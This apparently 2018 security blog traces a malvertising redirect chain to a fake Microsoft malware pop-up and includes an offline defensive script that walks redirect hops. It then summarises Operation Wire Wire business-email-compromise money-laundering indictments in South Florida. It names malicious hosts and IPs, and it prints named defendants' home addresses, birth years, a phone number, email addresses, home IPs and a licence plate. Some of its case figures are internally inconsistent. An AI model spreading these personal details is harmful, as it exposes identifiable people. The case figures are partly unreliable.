Friday, June 15, 2018

Fake Malware Pop-up Example

I don't believe I've ever done a video blog, but I wanted to show you what it looks like when we look at a fake malware pop-up.  While I was prepping a lecture for a class I'm teaching by looking at something on Encyclopedia Britannica, I experienced a fake malware popup.

Here's what I saw:

"Serifed.Stream" malicious pop-up
The best way to explain this is to show it to you.  To do so, I've saved a little video of what we saw.


In that walkthrough, you can see that the advertisement that led to the pop-up goes through a series of hops:

westerndigitalmeasure.com (192.241.254.144) was the first site I hit, which had me do a POST to /j/pcl.php

(By the way, Westerndigitalmeasure.com is hosted at Cloudflare)

That PHP code sent me to "orgeles-hantests.com" (52.72.0.63) which immediately did a meta refresh to another page on orgeles-hantests.com which had a "redirect?target=(very long string here)"

That sent me to the host "redirect.orgeles-hantests.com" (54.89.11.221) which did another meta refresh to the site "server3.divinedessert.info" (67.207.82.78).

And divinedessert forwarded me to "serifed.stream" which is where we saw the fake Microsoft malware warning, which, by the way, captured and passed on my Internet service provider name and my home IP address in the URL.
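Walking a chain like this by hand is tedious, and a browser hides the intermediate hops. The script below is an added example (not the blog's own code): it follows HTTP Location redirects and HTML meta refreshes, records each hop, lists the distinct hosts for reputation lookups, and flags query parameters that carry the visitor's IP address, as the final URL in the video did. The hop structure is reproduced with constructed responses and made-up hostnames (ad-entry.example, hop2.example and so on); nothing is fetched from the network.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# A fetcher returns (status, headers, body) for one URL and must NOT follow redirects itself.
Response = Tuple[int, Dict[str, str], str]
Fetcher = Callable[[str], Response]

_META_TAG = re.compile(r"<meta\b[^>]*>", re.IGNORECASE)
_ATTR = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
_IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")

def _attrs(tag: str) -> Dict[str, str]:
    """Attribute name -> value for one HTML tag (quoted or unquoted values)."""
    return {m.group(1).lower(): next(v for v in m.groups()[1:] if v is not None)
            for m in _ATTR.finditer(tag)}

def meta_refresh_target(html: str, base_url: str) -> Optional[str]:
    """Absolute URL named by the first <meta http-equiv="refresh"> tag, or None.
    Handles any attribute order, 'url=' in any case, quoted and relative targets."""
    for tag in _META_TAG.findall(html):
        attrs = _attrs(tag)
        if attrs.get("http-equiv", "").strip().lower() != "refresh":
            continue
        for part in attrs.get("content", "").split(";")[1:]:
            part = part.strip()
            if part.lower().startswith("url="):
                return urllib.parse.urljoin(base_url, part[4:].strip().strip("'\""))
    return None

@dataclass
class Hop:
    url: str
    status: int
    via: Optional[str]  # how the chain left this hop: "location", "meta-refresh", "loop" or None (end)

def walk_chain(start_url: str, fetch: Fetcher, max_hops: int = 10) -> List[Hop]:
    """Follow HTTP 3xx Location headers and HTML meta refreshes, recording every hop."""
    hops: List[Hop] = []
    seen, url = set(), start_url
    while url and len(hops) < max_hops:
        if url in seen:  # redirect loop: record it and stop
            hops.append(Hop(url, 0, "loop"))
            break
        seen.add(url)
        status, headers, body = fetch(url)
        location = next((v for k, v in headers.items() if k.lower() == "location"), None)
        if 300 <= status < 400 and location:
            nxt, via = urllib.parse.urljoin(url, location), "location"
        else:
            nxt = meta_refresh_target(body, url)
            via = "meta-refresh" if nxt else None
        hops.append(Hop(url, status, via))
        url = nxt
    return hops

def distinct_hosts(hops: List[Hop]) -> List[str]:
    """Hostnames in first-seen order: the list to feed to reputation lookups or blocklists."""
    hosts: List[str] = []
    for h in hops:
        host = urllib.parse.urlsplit(h.url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts

def client_data_in_query(url: str) -> List[Tuple[str, str]]:
    """Query parameters whose value is an IPv4 address, i.e. the visitor's own IP echoed into the URL."""
    query = urllib.parse.urlsplit(url).query
    return [(k, v) for k, v in urllib.parse.parse_qsl(query, keep_blank_values=True) if _IPV4.match(v)]

# Constructed offline fixture with the same shape as the chain in the post (POST target -> 302 ->
# meta refresh -> "redirect?target=" -> meta refresh -> landing page); the hostnames are made up.
CONSTRUCTED_RESPONSES: Dict[str, Response] = {
    "https://ad-entry.example/j/pcl.php": (302, {"Location": "https://hop2.example/land"}, ""),
    "https://hop2.example/land": (200, {}, '<html><head><meta http-equiv="refresh" '
        'content="0;url=/redirect?target=aHR0cHM6Ly9ob3AzLmV4YW1wbGUvcg"></head></html>'),
    "https://hop2.example/redirect?target=aHR0cHM6Ly9ob3AzLmV4YW1wbGUvcg": (200, {},
        "<meta content='0; URL=\"https://hop3.example/r\"' http-equiv=refresh>"),
    "https://hop3.example/r": (200, {}, '<meta http-equiv="Refresh" '
        'content="1; url=https://final.example/live/?isp=Example%20ISP&ip=203.0.113.7">'),
    "https://final.example/live/?isp=Example%20ISP&ip=203.0.113.7": (200, {},
        "<html><body>Fake 'your PC is infected' page</body></html>"),
}

def fixture_fetch(url: str) -> Response:
    """Offline fetcher that serves the constructed responses above."""
    return CONSTRUCTED_RESPONSES[url]

if __name__ == "__main__":
    chain = walk_chain("https://ad-entry.example/j/pcl.php", fixture_fetch)
    for i, hop in enumerate(chain, 1):
        print(f"{i}. {hop.status} {hop.url} -> {hop.via}")
    print("hosts to check:", distinct_hosts(chain))
    print("client data in final URL:", client_data_in_query(chain[-1].url))
```

For live use, supply a fetcher that returns the raw response without auto-following redirects (for urllib, an HTTPRedirectHandler whose redirect_request returns None), otherwise the intermediate hops are lost.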

We asked the URL scanner at VirusTotal to check out "serifed.stream" and "serifed.stream/live/" but got the same result both ways: 0 of 68 URL reputation engines believe the site to be malicious.

Don't Worry, Be Happy, says 68 different URL Reputation Services

When we look by IP address, things aren't much better.  Of the hundreds of ".stream" domains hosted on that same IP address, 185.44.65.141, which, by the way, is hosted in Iran, almost NOBODY found them to be malicious:

That last one shown, with 5 of 68 URL reputation services saying it might be bad, could also be interpreted as 63 out of 68 URL reputation services would have let your users see the bad content.  HOPEFULLY, they might have blocked a redirector somewhere in between, but honestly, I don't know . . . (this is the part where all of them will complain VirusTotal doesn't capture the totality of their user experience.  Yeah, yeah, yeah, cry me a river. I'm running AV and it happened to me!  Did you see the video?)



How to conclude?  I don't know.  Perhaps by just saying "the criminals are still ahead of us in this game, and this is why we can't have nice things."

Wednesday, June 13, 2018

Operation Wire Wire: the South Florida Cases Part 3

In the main DOJ Operation Wire Wire press release, the South Florida cases are described like this:

  • Following an investigation by the FBI and the U.S. Secret Service, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million from proceeds of BEC scams, including eight people charged in an indictment unsealed last week in Miami. These eight defendants are alleged to have conspired to launder proceeds from numerous BEC scams, totaling at least approximately $5 million, including approximately $1.4 million from a victim corporation in Seattle, as well as various title companies and a law firm.
In Part 1 we reviewed 17-CR-20748, the case against Destiny Asjee Rowland, Lourdes Washington, and Cynthia Rodriguez.  (See Operation Wire Wire: The South Florida Cases, Part 1.)

In Part 2 we reviewed 18-CR-20170, the case against Eliot Pereira, Natalie Armona, Melissa Rios, Bryant Ortega, Angelo Santa Cruz, Alexis Fernandez Cruz, Roberto Carlos Gracia, Jose E. Rivera, Angeles De Jesus Angulo, Jennifer Ruiz, Yirielkys Pacheco Fernandez, and Sebastian Loayza.  (See Operation Wire Wire: The South Florida Cases, Part 2.)

Part 3 in our blog series focuses on those "eight people charged in an indictment unsealed last week in Miami", which refers to case 18-CR-20415, the case against Gustavo Gomez, Selene Joya, Jaremy Lucia Mena, Jose Brito Garcia, Jessica Hyde, Hillary Lee Williams, Juan Frias, and Ariel Champaign Edwards.

What links all of these cases together is that in each case, the ring leaders were recruited into their scam by the same individual: Roda Taher, who will be the focus of our next blog post "Operation Wire Wire: Who is Roda Taher?" 

The indictment begins with the statement:

"Roda Taher, aka Ressi, aka Rezi, hereinafter Taher, was the manager and supervisor of a criminal organization that engaged in money laundering by utilizing money mules and recruiters in the Southern District of Florida, in other places in the United States, and in foreign commerce."

It then introduces our cast of characters.  As in South Florida case 1 and case 2, each of the players is recruited and instructed to set up a shell company, incorporating it in Florida and establishing corresponding bank accounts with which to receive the proceeds of various Business Email Compromise and Spear Phishing attacks, which fool company employees into wiring funds, or transferring them via ACH, into the shell company accounts.

Defendant #1: Gustavo Gomez, b.1985, incorporated AG Universal Links in Hollywood, Florida.
Defendant #2: Selene Joya, b. 1990, incorporated Joya Star Life, Inc. in Miami Gardens, Florida.
Defendant #3: Jaremy Lucia Mena, b. 1992, incorporated Jaremy International, Inc. in North Miami, Florida.
Defendant #4: Jose Brito Garcia, b. 1981, incorporated Brito Commercial Products, Inc. in Hollywood, Florida.
Defendant #5: Jessica "Chuchi" Hyde, b.1987, incorporated Hyde Quality Inc. in Cutler Bay, Florida.
Defendant #6: Hillary Lee Williams, b. 1992, incorporated H Lee W Trade Group Inc. in Miami, Florida.
Defendant #7: Juan Frias, b. 1985, incorporated Ocean Surplus, Inc. in Miami, Florida.
Defendant #8: Ariel Champaign Edwards, b. 1991, incorporated Ariel Prime Trades Inc. in Miami, Florida.

Gustavo Gomez worked closely with Roda Taher and other recruiters to recruit money mules and coach them in the manner in which they should set up their bank accounts.  According to the indictment:

"The recruiters would instruct money mules to open bank accounts in the name of their shell companies at various banks in the Southern District of Florida and elsewhere, and to falsely tell bank representatives that their shell company was a legitimate business engaged in the sale, import, or export of goods.  Taher and his recruiters gave different money mules a variety of false and fraudulent explanations regarding the nature of their businesses, including the sale, export, or import of textiles, furniture, electronics, or other goods.  However, the shell companies would not conduct any legitimate business."

"Once a money mule had opened a shell bank account in his or her shell company's name, those accounts would receive wire transfers of the proceeds of various fraudulent schemes.  The fraudulent schemes included, primarily, but were not limited to, email hacking or spoofing, also known as business email compromise and spearphishing scams.  Co-conspirators would hack into a victim's email account or otherwise take over that account without permission.  In a variation of this scheme, co-conspirators would "spoof" or create a fraudulent email account that was made to look like a victim's real email account.  The co-conspirators would then send email messages via the hacked or spoofed email accounts to individuals or corporations, instructing them to wire large sums of money to the money mules' shell bank accounts."

Roda Taher and the other recruiters would notify the mules when funds would be arriving into their accounts. These communications were primarily via the mobile phone encrypted messaging service WhatsApp.  They would be given instructions on what amounts would be received, where to wire the funds, and what commissions they were allowed to withdraw.  The commissions would be split with their recruiter, while the wires often sent the bulk of the money to China, Poland, and other destinations.

When banks closed the accounts, Taher would instruct the mules to open additional accounts at other banks.  Top performing mules were invited to become recruiters by inviting others to join the scheme as mules.  Recruiters received a percentage of the proceeds from the work of each mule they recruited.

The transactions particularly mentioned in the indictment are listed here. 

| Count | Date | Defendant | Transaction |
|---|---|---|---|
| 2 | 02JUL2014 | Gustavo Gomez | $48,500 from AG Universal Links' Wells Fargo Bank account to Sonish Enterprises FZE in Dubai, UAE |
| 3 | 18JUL2014 | Gustavo Gomez | $192,000 from AG Universal Links' Wells Fargo Bank account to Sonish Enterprises FZE in Dubai, UAE |
| 4 | 19JUL2014 | Gustavo Gomez | $4,500 from AG Universal Links' Wells Fargo Bank account to Zion Luxury Car Rental Inc. |
| 5 | 01AUG2016 | Selene Joya | $8,600 from Joya Star Life Inc's Bank of America account |
| 6 | 01AUG2016 | Selene Joya | $5,500 from Joya Star Life Inc's Bank of America account |
| 7 | 01AUG2016 | Selene Joya | $4,000 from Joya Star Life Inc's Bank of America account |
| 8 | 26JAN2017 | Jaremy Lucia Mena | $78,902 from Jaremy International Inc's TD Bank account to Bella Tyre Co Ltd in China |
| 9 | 26JAN2017 | Jaremy Lucia Mena | $9,400 from Jaremy International Inc's TD Bank account |
| 10 | 13FEB2017 | Jose Brito Garcia | $37,904 from Brito Commercial Products Inc's TD Bank account to Huge Elite Limited in Shanghai, China (*) |
| 11 | 17MAY2017 | Hillary Lee Williams | $79,980 from H Lee W Trade Group's SunTrust Bank account to Redington Gulf FZE in Dubai, UAE |
| 12 | 06SEP2017 | Juan Frias | $59,700 from Ocean Surplus Inc's TD Bank account to Zhejiang Oudi Machine Co. Ltd. in Zhejiang, China |
| 13 | 02NOV2017 | Ariel Champaign Edwards | $8,200 from Ariel Prime Trade Inc's Wells Fargo account |
| 14 | 21NOV2017 | Ariel Champaign Edwards | $700 from Ariel Prime Trade's Bank of America account |

* - Worth noting that "Huge Elite Limited" in Shanghai, China was also the recipient of ill-gotten gains from Bryant Ortega in "Part 2."

This case is much "fresher" than some of the others.  The first arraignment in the case was Gustavo Gomez's appearance on May 31, 2018.  Gustavo just bonded out on June 11, 2018, for $50,000 posted by his girlfriend's brother.

Tuesday, June 12, 2018

Operation Wire Wire: the South Florida Cases Part 2

The Second South Florida case is linked to the first because this entire conspiracy also is part of the work of Roda Taher, AKA Ressi, AKA Rezi, the top recruiter in the first case.  However, in this 30 count indictment, the only one NOT named is Roda Taher.

Rezi recruited Eliot Pereira and Melissa Rios, below, who each in turn recruited others.

Defendant #1:  Eliot Pereira, b.1993 - opened "Eliot Products & Arts, Inc." and recruited and managed mules.
Defendant #2: Natalie Armona - opened "Armona Furniture Design Concept & Textile" and recruited and managed multiple mules and recruiters, including defendants #5, #8, #9, #10, and #12.
Defendant #3: Melissa Rios, b. 1996 - opened "Taihan Fiberoptics, Inc." and recruited #2
Defendant #4: Bryant Ortega, b. 1996 - opened "Bryant Tech Deals" and recruited and managed multiple mules, including Defendant #7. (4631 West 9th Court, Hialeah, FL 33012)
Defendant #5: Angelo Santa Cruz, b. 1994 - opened "ASC Worldwide, Inc" and recruited and managed multiple mules, including Defendants #6 & #11.
Defendant #6: Alexis Fernandez Cruz, b. 1992 - opened "Alexis Universal, Inc."
Defendant #7: Roberto Carlos Gracia, b. 1994 - opened RCG Deals, Inc.
Defendant #8: Jose E. Rivera, b. 1989 - opened Rivera Worldwide, Inc.
Defendant #9: Angeles De Jesus Angulo, b. 1996 - opened Angeles Premier Trades, Inc.
Defendant #10: Jennifer Ruiz, b. 1994 - opened Josette Quality, Inc.
Defendant #11: Yirielkys Pacheco Fernandez, b. 1984 - opened YF Nationwide, Inc.
Defendant #12: Sebastian Loayza, b. 1994 - opened Sure Trades, Inc.

This case starts off with a criminal complaint from the Miami office of the United States Secret Service.

It begins with the agent's overview of the case, which is worth quoting here:

"Federal law enforcement agents have been investigating numerous business email compromise and spear phishing scams wherein various fraudsters targeted employees with access to company finances and tricked them into making wire transfers to bank accounts thought to belong to trusted partners -- except in fact, the accounts were shell companies controlled by the fraudsters.

Different people played different roles in the scheme.  Some of the co-conspirators hacked into and took control over certain victim companies' business email accounts without the knowledge or consent of the true email account holders, or created email accounts similar to, but slightly different from, real business email accounts.  Using the sham or compromised email accounts, the fraudsters then sent emails soliciting payments, claiming that funds were owed, and representing that payments for services rendered by the victim companies should be redirected to different accounts.

Other co-conspirators, known as money mules, opened shell companies and bank accounts into which the funds were fraudulently transferred, and then withdrew the fraud proceeds in cash, or wired the fraud proceeds into their foreign and domestic bank accounts.  Several money mules progressed to recruiting and managing other mules."

Natalie Armona may have been a good choice for Melissa to recruit based on her work.  Here's a Facebook post of hers from last year!  But by the dates, she had been in the money mule business quite a while before landing this job as a Junior Processor at a lending firm.


Armona's TD Bank account 

The complaint begins by telling the story of Natalie ARMONA, who opened a business, Armona Furniture Design Concept & Textile Inc., incorporating the business in Florida using her home address and opening a business checking account at TD Bank.  She was the sole signatory, and used her true social security number on the account.  The account was opened on December 9, 2016 and received its first wire December 14, 2016, from a scammed medical center (Victim Company A).  After taking out her commission in cash ($5,500) using her true Florida driver's license number as identity confirmation, Armona wired the rest of the money to "Flame Land International Limited" in Hong Kong.

On December 21, 2016, Armona's TD Bank account received an ACH for $724,395.  Armona again paid herself first, withdrawing $10,508 in person.  Three wires went out: $288,301 to "Caplan Sp Zoo" in Warszawa, Poland; $194,110 to the same; and $94,218 to "Baolifeng Intl Trading Limited" in Shenzhen, China.  Armona paid herself twice more, once for $5,500 and once for $9,400.  On December 27, 2016, she dipped three more times, for $800, $3,800, and $9,900.

Armona's SunTrust Bank account 

On December 9, 2016, Armona Furniture opened a SunTrust Bank account.  On December 30th she got an inbound ACH of $35,170 from a Pennsylvania sign company.  Also on December 30th, she got an incoming wire from Kukutula Development Company LLC in Koloa, Hawaii in the amount of $59,850.  On January 3, 2017, Armona withdrew $35,170.  On January 13, 2017, SunTrust closed the account for fraud with a balance of $59,850.

ASC WorldWide

A collaborating witness told the Miami Electronic Crimes Task Force that he had been recruited by Armona and had opened a shell company in the name ASC WorldWide, with accounts at TD Bank and SunTrust Bank.  Among other activities, he used email-based scams to cause $80,000 to be wired.

After a few successful jobs, the suspect said that Armona told him he could earn extra money by recruiting others into the scam.  He agreed to allow the USSS to record his emails, phone calls, and any text or WhatsApp communications involving others in the scheme.

The Ortega Case 

Although Bryant is not credited with recruiting Natalie Armona, the two are Facebook friends.  Bryant's profile also suggests that he may have had access to Personal Information, as an agent at a Health Insurance organization.  His cover photo indicates he's a fan of money!


The same USSS agent who did Armona's case also swore out the affidavit of criminal complaint against Bryant Ortega.  Ortega opened a TD Bank account for his new corporation, Bryant Tech Deals, which matched his home address of 2160 NW 111 Avenue, Sunrise, Florida 33322.  Bryant Tech Deals also opened a SunTrust account.  Both accounts were opened on February 13, 2017, and on March 6, 2017 the SunTrust account received an inbound wire of $283,750.50.  On March 7th, three withdrawals were made: $500 from an ATM, $5,600 over-the-counter, and $8,400, also over-the-counter.  Ortega's true Florida driver's license was shown as proof of identity for the in-person withdrawals.  Also on March 7, 2017, $94,110 was wired to "Huge Elite Limited" in Shanghai, China.  After paying himself three more times the following day ($400 ATM, $800 at the counter, and $6,200 at the counter), another wire of $128,705 went to Huge Elite Limited.  On March 9, 2017, an additional $33,000 was wired out to "Lofty Ease Limited" in Shanghai, China.
(Ortega was arrested Jan 25, 2018)

The Pereira Case 

The third case, Feb 23, 2018, has an affidavit from Miami's FBI office from an agent who previously served as a Computer Scientist in the Philadelphia office!  Pereira ran several schemes against companies by impersonating their officers, including Fakhoury Law Group (Troy, Michigan), High Tech Lending (San Diego, California), Gaumer Company (Houston, Texas), Park Corporation (Cleveland, Ohio), and Zija International (Lehi, Utah).  Each of those companies received fraudulent emails, claiming to be from an executive of their own company, ordering that wires be sent to accounts controlled by "OS Fly Tech Incorporated."  Pereira hired an unnamed middleman to set up additional corporate accounts at Bank of America, Wells Fargo, SunTrust Bank, and Regions Bank.  The middleman says that Pereira was working with an unknown male whom he called "Rezi."  This would be the same person that Cynthia Rodriguez was working for, Roda Taher (see Operation Wire Wire: The South Florida Cases, Part 1).  Pereira and Rezi gave one of their mules an email address, os20technologies@gmail.com, to use.

As shown above, nearly $1M in wires were sent to company accounts at Bank of America, SunTrust Bank,  TD Bank, and Wells Fargo Bank in September and October of 2016.  Pereira and his middleman communicated through WhatsApp and Email.  (954.554.5501 / bossmanweston@gmail.com / osflytechnologies@gmail.com )

The Big Picture 

Roda Taher, AKA Ressi, AKA Rezi, was the manager and supervisor of a criminal organization in the Southern District of Florida and elsewhere.  He recruited all of the defendants in this case, encouraged them to open shell accounts and receive illegally transferred funds, some of which they directly wired to China, Poland, and elsewhere.

The case involves 30 distinct financial transactions:
| Count | Date | Defendant | Transaction |
|---|---|---|---|
| 2 | 02SEP2016 | Eliot Pereira | $89,630 from OS Fly Tech's Wells Fargo account to China |
| 3 | 30NOV2016 | Melissa Rios | $13,844 from Tiahan Fiberoptics Inc's TD Bank account to Huzhou Nanmei Textile |
| 4 | 23DEC2016 | Natalie Armona | $288,301 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland |
| 4 | 23DEC2016 | Natalie Armona | $194,110 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland |
| 5 | 23DEC2016 | Natalie Armona | $288,301 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland |
| 6 | 23DEC2016 | Natalie Armona | $94,218 from Armona Furniture's TD Bank account to Baolifeng Intl. Trading Limited in Shenzhen China |
| 7 | 12JAN2017 | Natalie Armona | $44,618 from Armona Furniture's TD Bank account to Hangzhou Jieenda Textile Co Ltd in China |
| 8 | 07MAR2017 | Bryant Ortega | $94,110 from Bryant Tech Deal's SunTrust account to Huge Elite Limited in Shanghai, China |
| 9 | 08MAR2017 | Bryant Ortega | $128,705 from Bryant Tech Deal's SunTrust account to Huge Elite Limited in Shanghai, China |
| 10 | 08MAR2017 | Bryant Ortega | $6,200 from Bryant Tech Deal's SunTrust account |
| 11 | 28MAR2017 | Bryant Ortega | $179,302 from Bryant Tech Deal's SunTrust account to Lofty Ease Limited in Shanghai, China |
| 12 | 14APR2017 | Roberto Carlos Garcia | $3,500 from RCG Deals Inc's Bank of America account |
| 13 | 17APR2017 | Roberto Carlos Garcia | $112,000 from RCG Deals Inc's Bank of America account to KT and G Corp |
| 14 | 17APR2017 | Roberto Carlos Garcia | $7,000 from RCG Deals Inc's Bank of America account |
| 15 | 17APR2017 | Roberto Carlos Garcia | $3,000 from RCG Deals Inc's Bank of America account |
| 16 | 28APR2017 | Jennifer Ruiz | $39,841 from Josette Quality Inc's TD Bank account to Huzhou Nanmei Textile Co. Ltd. |
| 17 | 28APR2017 | Jennifer Ruiz | $3,400 from Josette Quality Inc's TD Bank account |
| 18 | 04MAY2017 | Roberto Carlos Garcia | $100 from RCG Deals Inc's Bank of America account |
| 19 | 26OCT2017 | Angelo Santa Cruz | $88,950 from ASC Worldwide's Chase Bank account to Niche Holding Ltd. |
| 20 | 26OCT2017 | Angelo Santa Cruz | $7,000 from ASC Worldwide's Chase Bank account |
| 21 | 01NOV2017 | Alexis Fernandez Cruz | $8,600 from Alexis Universal Inc's TD Bank account |
| 22 | 07NOV2017 | Angelo Santa Cruz | $96,500 from ASC Worldwide's TD Bank account to Zhejiang Oudi Machine Co. Ltd. |
| 23 | 07NOV2017 | Angelo Santa Cruz | $8,500 from ASC Worldwide's TD Bank account |
| 24 | 09NOV2017 | Alexis Fernandez Cruz | $8,500 from Alexis Universal Inc's SunTrust Bank account |
| 25 | 21NOV2017 | Yirielkys Pacheco Fernandez | $34,810 from YF Nationwide Inc's Chase Bank account to Nantong Gomaa International Co. Ltd. |
| 26 | 06DEC2017 | Yirielkys Pacheco Fernandez | $88,528 from YF Nationwide Inc's Chase Bank account |
| 27 | 30NOV2017 | Jose E. Rivera | $54,210 from Rivera Worldwide Inc's Bank of America account to Zhejiang Senhuang Trading in Zhejiang, China |
| 28 | 30NOV2017 | Jose E. Rivera | $6,100 from Rivera Worldwide Inc's Bank of America account |
| 29 | 03JAN2018 | Angeles De Jesus Angulo | $79,400 from Angeles Premier Trades Inc's Wells Fargo Bank account to Farstar International Ltd |
| 30 | 03JAN2018 | Angeles De Jesus Angulo | $8,600 from Angeles Premier Trades Inc's Wells Fargo Bank account |

Altogether, this group is charged with laundering more than $5,000,000.

The case is scheduled to be heard in Jury Trial beginning on June 25, 2018 before Judge Marcia G. Cooke in Miami, Florida.

Tomorrow (June 13, 2018) two of the defendants are meeting to change their plea.  Jennifer Ruiz and Yirielkys Pacheco Fernandez have decided they may not want the 20 year sentence that all of them are facing as part of a conspiracy to commit money laundering at this level!

Operation Wire Wire: The South Florida Cases, Part 1

Yesterday we started a series of posts about Operation Wire Wire, where the Department of Justice announced charges against 74 people for Business Email Compromise and related scams.

The South Florida cases are so huge, we're actually going to break them into three parts as well.  In part one, we'll look at the case against Cynthia Rodriguez, Destiny Asjee Rowland, and Lourdes Washington.


Defendant #1: Cynthia Rodriguez:
18:1349.F Conspiracy to Commit Wire Fraud
18:1956-3300.F Conspiracy to Commit Money Laundering
18:1956-3300.F Money Laundering and Forfeiture Count

Defendant #2: Destiny Asjee Rowland
18:1343 Wire Fraud
18:1349 Conspiracy to Commit Wire Fraud
18:1956(h) Conspiracy to Commit Money Laundering
18:1956 Money Laundering
18:1956(a)(1)(B)(i) Money Laundering

Defendant #3: Lourdes Washington
18:1349 Conspiracy to Commit Wire Fraud
18:1956(h) Conspiracy to Commit Money Laundering
18:1956(a)(1)(B)(i) Money Laundering

According to the indictment against Destiny Asjee Rowland, Rowland incorporated "Asjee Luxury Inc" in July 2017 and claimed to be a furniture merchant wholesaler at 3688 NW 83rd Lane in Sunrise, Florida.  The victim companies in her case were a company in Eau Claire, Wisconsin, a lumber company in Illinois, and an escrow company in Roseville, California that was selling property for two people called "KW" and "TW" in the indictment.

Asjee Luxury opened accounts at TD Bank and SunTrust Bank.  Using other people's names and email addresses, she convinced companies to transfer money to her account.  In one instance she falsely claimed to be the lumber company and sent "urgent audit" notices to the Wisconsin company demanding immediate wire transfers of payments owed to the lumber company.  That email came from an IP address in Nigeria on July 27, 2017.  By July 28th, a Bank of America account in Wisconsin had sent $1,651,699 to her TD Bank account in Florida.

 She also caused the escrow company to redirect payments intended for their clients KW and TW to accounts she controlled, receiving $451,759 from a City National Bank account in California into her SunTrust Bank account in Florida on July 31, 2017.

Cynthia Rodriguez and Lourdes Washington have a ten page criminal complaint written by a US Secret Service agent to describe their case.  Washington created a new business, LW Nationwide Inc, at 9561 Fountainebleau Blvd, Apartment 402, Miami, Florida 33172, which coincidentally is also his driver's license address.  Then he opened a Bank of America account in that name.

A Real Estate attorney, BD, was handling the closing on several pieces of property.  On Feb 14, 2017, he received an email from ***@themarstongroup.com informing him that he would receive a check for $37,225 via registered mail, along with a 1099 tax form.  The next day, an email from the same name at ***@gmx.us said that he was leaving town unexpectedly and needed the funds sent via wire transfer instead.  Those funds were then directed to the BofA account of LW Nationwide, and were immediately RE-wired to a bank account in Zhejiang, China.  The same day, Washington withdrew funds from an ATM in Hialeah, Florida.  Three minutes later, at the same ATM, Cynthia Rodriguez withdrew funds from the LW Nationwide account, using the same debit card as Washington.  Bank of America's logs reveal that an IP address, 50.143.68.4, was used to access the account.  That IP address was Rodriguez's home Comcast Cable account at 2914 Funston Street, in Hollywood, Florida.  Rodriguez made additional withdrawals from the account, including from a drive-through ATM whose cameras captured the license plate of her Nissan Quest, 520-TML, registered to Rodriguez.

Washington was later arrested (December 2017) as a result of an open warrant in Kentucky, and testified to opening the accounts, making the wire transfers, and doing the cash withdrawals "at the behest of her recruiter/manager" who she did not identify.

Meanwhile, the Eau Claire, Wisconsin business contacted the US Secret Service about the scam involving the fake invoices from the lumber company.  Records from the state of Florida revealed that Asjee Luxury only had one officer, and one signatory on their bank accounts.  What seems to be a cooperating witness (Individual 1) in that case revealed that Rodriguez had recruited them to open several sham business accounts, including the TD Bank account belonging to Asjee Luxury!  Shortly after the California real estate company wired money into that account, ATM video footage showed Individual 1 withdrawing $8,000 cash from the account.  Individual 1 would then give half of the money to Rodriguez and keep the other half.  Individual 1 also opened a shell company called Wide Assure Trades Inc and a corresponding Bank of America account.

On October 27, 2017, Rodriguez notified Individual 1 that Wide Assure Trades was going to receive some money.  That account was logged into the same day from 76.18.27.6, the IP address that Comcast listed for Rodriguez's home address at 2914 Funston Street, Hollywood Florida at that time.  (DHCP addresses change from time to time.)

Later an additional document, not an indictment, but rather a "Superseding Information", was filed.

The Superseding Information reveals that Cynthia Rodriguez had incorporated "CR Elegant Trades" in September 2014 from her home address in Hialeah, Florida.  We already spoke of Washington's company, LW Nationwide, and Rowland's company, Asjee Luxury.  The superseding information speaks of (but does not give many details) an ongoing conspiracy from 2014 until 2018 that involved the creation of many shell companies and many fraudulent wire transfers. 

"It was the purpose of the conspiracy for the defendants and their co-conspirators to unlawfully enrich themselves by obtaining and misappropriating money from victims, by making materially false and fraudulent representations, and by the concealment of material facts, concerning, among other things, the true identity of the defendants and their co-conspirators and the purported need for victims to make payments to the defendants and their co-conspirators."

Lourdes Washington entered a plea agreement that included the fact that she may face 20 years in prison, 3 years supervised release, and a fine of $250,000 or double the pecuniary gain, as well as restitution, and acknowledging that they may be "denaturalized and removed" as a result of their crimes.  In other words, Washington had a public defender, as the only funds they tie to her are $37,225.  (It will be interesting to see what actually happens at sentencing on July 9, 2018.)

Cynthia Rodriguez also pleaded guilty, but in her case, she named her recruiter.  In the plea agreement, she agrees that she and her co-conspirators opened shell corporations and bank accounts for the purpose of receiving proceeds of wire fraud scams in exchange for a percentage of profits.  But then she says she was recruited to the scam by Roda TAHER.  Taher, AKA Res, AKA Rezi, AKA Ressi, recruited Rodriguez initially as a money mule, but advanced her to being a sub-recruiter, working to hire and manage additional money mules in the South Florida area.  Rodriguez was responsible for providing corporate documents for her mules' shell companies, driving the money mules to banks, or ordering them to open certain accounts at certain banks, and accompanying them to withdraw funds.  She also provided directions to money mules on how to hide their schemes from banks, law enforcement and other individuals.

Rodriguez's plea agreement states that she knew the money was coming from wire fraud, and that she knew that business email compromise and spear phishing scams were used, including email account takeovers and "spoofed" email accounts making the victims believe they were making wire transfers to trusted partners, but instead depositing the funds into the accounts of the fraudsters.  Rodriguez says that she used the phone application "WhatsApp" to exchange encrypted messages with co-conspirators, including Taher, in order to evade detection by law enforcement.  Her plea confesses to laundering at least $4,760,669.80 between herself and the mules she recruited.

Like Washington, Rodriguez's plea states that she may do 20 years plus 3 supervised, and pay a fine of $250,000 or double the pecuniary gain, plus restitution, and that she may face denaturalization and removal.

Base Offense Level for Washington was 8.  Increased by 18 levels due to the amount of laundered funds being between $3.5M and $9.5M.  +3 because she was a manager or supervisor in a scheme involving 5 or more participants.  +2 because of 18 USC 1956, and +2 because of the "sophisticated nature" of the laundering.  So, a level 33 offense.  They only decreased her 3 levels for "demonstrating acceptance of responsibility and assisting authorities in the investigation".  So she is still facing a level 30 offense.

"Furthermore, the Defendant stipulates that she owes restitution in the amount of $4,760,669.80!"

The plea agreement was signed May 23, 2018.  Rodriguez will be sentenced on July 11, 2018.

